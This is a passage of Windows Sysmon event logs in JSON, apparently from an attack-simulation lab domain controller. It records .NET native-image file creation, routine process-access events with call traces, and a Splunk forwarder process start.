(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8211,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:55.513\r\nProcessGuid: {E2A3D6B1-1362-5F25-0000-0010535E0E00}\r\nProcessId: 4528\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11b0-0\\System.Data.OracleClient.dll\r\nCreationUtcTime: 2020-08-01 07:01:55.513","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:55.513","ProcessGuid":"{E2A3D6B1-1362-5F25-0000-0010535E0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11b0-0\\System.Data.OracleClient.dll","CreationUtcTime":"2020-08-01 07:01:55.513","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8212,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:55.560\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1363-5F25-0000-0010CE620E00}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:55.560","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1363-5F25-0000-0010CE620E00}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8213,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:55.560\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1363-5F25-0000-0010CE620E00}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:55.560","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1363-5F25-0000-0010CE620E00}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8214,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:55.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1363-5F25-0000-0010CE620E00}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:55.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1363-5F25-0000-0010CE620E00}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8215,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:55.794\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:55.794","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8216,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:55.966\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1363-5F25-0000-0010DE670E00}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:55.966","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1363-5F25-0000-0010DE670E00}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8217,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:55.966\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1363-5F25-0000-0010DE670E00}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:55.966","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1363-5F25-0000-0010DE670E00}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8218,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:55.982\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1363-5F25-0000-0010DE670E00}\r\nTargetProcessId: 3756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:55.982","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1363-5F25-0000-0010DE670E00}","TargetProcessId":"3756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8219,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nProcessGuid: {E2A3D6B1-1364-5F25-0000-0010E56D0E00}\r\nProcessId: 2464\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: 